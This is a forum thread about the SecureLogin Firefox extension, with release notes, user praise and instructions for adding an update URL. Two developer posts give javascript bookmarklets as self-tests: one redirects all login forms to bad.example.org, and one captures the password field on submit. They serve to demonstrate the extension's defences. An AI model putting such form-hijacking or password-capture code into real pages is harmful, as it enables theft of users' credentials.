[-ck-]

Could you possibly give us a user-selectable choice of activation keystroke?
I'm not crazy about ALT+N

[madblueimp]

I thought about implementing a keyboard shortcut setting and halfway implemented it but didn't finish for these reasons:
- ALT+N isn't used yet according to http://kb.mozillazine.org/Keyboard_shor ... s_(Firefox)
- ALT+N can be performed with one hand
- most people don't bother about changing the hotkey
- There exists a keyboard shortcut extension, which can configure SecureLogin's shortcut as well => http://www.extensionsmirror.nl/index.php?showtopic=254
- The SecureLogin keyboard shorcut can be configured manually by changing the language files

[madblueimp]

I added a "Custom Update URL" as it can take a while until SecureLogin will be listet at addons.mozilla.org.
This way, you can update SecureLogin automatically.

To enable the auto-update without having to install the new version manually, you can do the following:

Close Firefox.

Open the following directory:
--> [YOUR FIREFOX PROFILE]/extensions/secureLogin@blueimp.net/

Open the contained "install.rdf" with a texteditor that can handle UNIX line feeds (\n).

Add the following line just behind the "optionsURL":

Code: Select all

<em>https://blueimp.net/mozilla/update.rdf?itemid=%ITEM_ID%&amp;itemversion=%ITEM_VERSION%&amp;appid=%APP_ID%&amp;appversion=%APP_VERSION%&amp;appos=%APP_OS%</em>

Important: Instead of just "em" you have to use the tags "em:updateURL".

phpBB doesn't allow them to display properly.

Better explanation:
The entry must look like the examples described on http://developer.mozilla.org/en/docs/in ... #updateURL just with the url I provide:
https://blueimp.net/mozilla/update.rdf?itemid=%ITEM_ID%&itemversion=%ITEM_VERSION%&appid=%APP_ID%&appversion=%APP_VERSION%&appos=%APP_OS%

After doing that, the update to version 0.4.1 should be available.

As an alternative, just install the new version 0.4.1 manually, which includes the updateURL.

[madblueimp]

Version 0.5.2 released with new features:

- Warning if changing second level domain on login
- List of exceptions for websites which do not work with the "JavaScript protection on login" option
- Extended statusbar icon context menu with shortcuts to saved passwords, "remember passwords rejection list" and SecureLogin settings

[madblueimp]

If you input and run the following JavaScript code in your location bar, after loading a page for which you saved passwords, you can test one of the security enhancements of the SecureLogin-extension:

Code: Select all

javascript:(function(){for(var i=0;i<document.forms.length;i++){document.forms[i].action='http://bad.example.org';}})();

SecureLogin will ask you on login if you really want to login to bad.example.org. You are then able to stop the login and prevent sending your credentials to bad.example.org.

The icons tooltip show the changed login url as well.

[madblueimp]

Another test, this time to demonstrate the optional "JavaScript protection on login":

Just input the following JavaScript code in your location bar and run it after loading a login page for which you saved your password before:

Code: Select all

javascript:(function(){for(var i=0;i<document.forms.length;i++){document.forms[i].addEventListener('submit',function(event){for(var j=0;j<event.currentTarget.elements.length;j++){if(event.currentTarget.elements[j].type=='password')alert('Password: '+event.currentTarget.elements[j].value);}},false);}})();

Without active "JavaScript protection" your password will be displayed in a warning box (alert) on login.
If you enable the setting, this won't happen.

Therefore, I recommend you to activate the option "JavaScript protection on login" and add websites that don't work to the exception list.

[spyder]

Thanks for this extension, and thanks for the frequent updates.

This is really nice, secure and handy.

[jimfitter]

Very nice, very helpful extension. Works fine for me using Bon Echo 2.0.0.2pre.

Thank you.

[DMCrimson]

Installed this, and immediately thought this to be one of the best extensions I've installed:)

[madblueimp]

Wow, thanks for the praise.

Would be nice if you would vote for it when it shows up on addons.mozilla.org.
I hope it will not be too long until approval, by now it still says

Approval Queue Status: There are currently 360 add-ons awaiting review

[Uncle Spellbinder]

I can't say enough about SecureLogin. This has turned into one of my "must have" extensions for Firefox. I'd like to see the devs incorporate this into Firefox.

[spyder]

I second that!

[DMCrimson]

Also, I find this more usable than default behaviour of Firefox:) BTW: is there any option to disable the form index from showing up?

[madblueimp]

BTW: is there any option to disable the form index from showing up?

Thanks for the hint - I just released version 0.5.3 which shows the form index only if there are really more than one valid login forms on the page.

[madblueimp]

Version 0.5.4 released:
- Secure Login now uses the saved userFieldName and passwordFieldName rather than searching for related fields in the form elements list.

Apart from that, the Secure Login project page has been redesigned for better accessibility and a better look.

The built-in Password Manager auto-fill feature has been improved as stated on Mozilla Foundation Security Advisory 2007-02:

The Firefox password manager was altered to take into account the destination site of the password data and only replay when a form's destination matches the one that was saved. This does not protect users if an attacker was able to inject script into the site in addition to form controls as the injected script could listen in on anything the user does.

In my opinion, auto-filling user+pass is still not secure as requiring a user action as is done with Secure Login.
Unfortunately, the newly saved form destination url seems not accessible for extension developers so far (no property additional property), as I would have liked to include this check as well.
But the Secure Login option to ask for confirmation on domain change adds protection in a similar way.